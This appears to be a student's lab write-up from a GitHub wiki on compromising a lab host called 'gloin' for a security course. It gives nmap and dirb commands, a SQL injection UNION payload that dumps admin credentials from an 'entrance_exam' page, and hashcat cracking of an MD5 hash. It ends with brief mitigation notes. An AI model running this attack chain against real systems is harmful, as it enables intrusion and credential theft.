Week 9: Lab 9.2 Exploiting Gloin - FlameSpyro/Tech-Journal GitHub Wiki
Week 9: Lab 9.2 Exploiting Gloin
Target IP Address
- Run a nmap scan. You'll notice there are new IPs in the network (.26-.32)
nmap 10.0.5.0-254 -sP
- We can find which one is gloin by flipping through nslookup
nslookup 10.0.5.31 10.0.5.22
- .31 is revealed to be gloin
Open Ports
- Running a nmap scan will show a new service being 3389
- 3389 is Microsoft Terminal Services and is relevant for our exploit
sudo nmap 10.0.5.31 -sV
Discovered Vulnerability
- I literally searched ms-wbt-server exploit 3389 and got this link
- Specifically the following
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.0.5.31
How you achieved a foothold
- Running dirb will tell you of hidden pages
dirb http://10.0.5.31/entrance_exam -r -w
- I took the Entrance Exam into exploitdb to find an exploit
- I injected the following into my URL
https://10.0.5.31/entrance_exam/admin/view_enrollee.php id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
- you are then given a page with a hashed email.
How you achieved Admin compromise
- Copy paste the hash into a file
- hashcat will be used (md5)
echo "4214db3884e9cd913b49b5b44e49ae96" > gloin.txt
hashcat -m 0 -a 0 -o gloinlist.txt gloin.txt /usr/share/wordlists/rockyou.txt
User Flag
ssh [email protected]
cd ..
cd gloin
cat user-flag.txt
Root Flag
cd Administrator
cat root-flag.txt
How might the vulnerabilities be mitigated by the systems administrator and developer?
- The first method that comes to mind is to have a complex password, such as special characters and a longer limit.
- Exploit db shows that the exploit was found because of its default settings. Perhaps modifying the website could prevent the exploit used.
Relflection
- Overall this lab was really cool as I feel like I had a consistent flow of things and problem solving! I did have a little help from a friend to use dirb and fixing my hashcat a bit.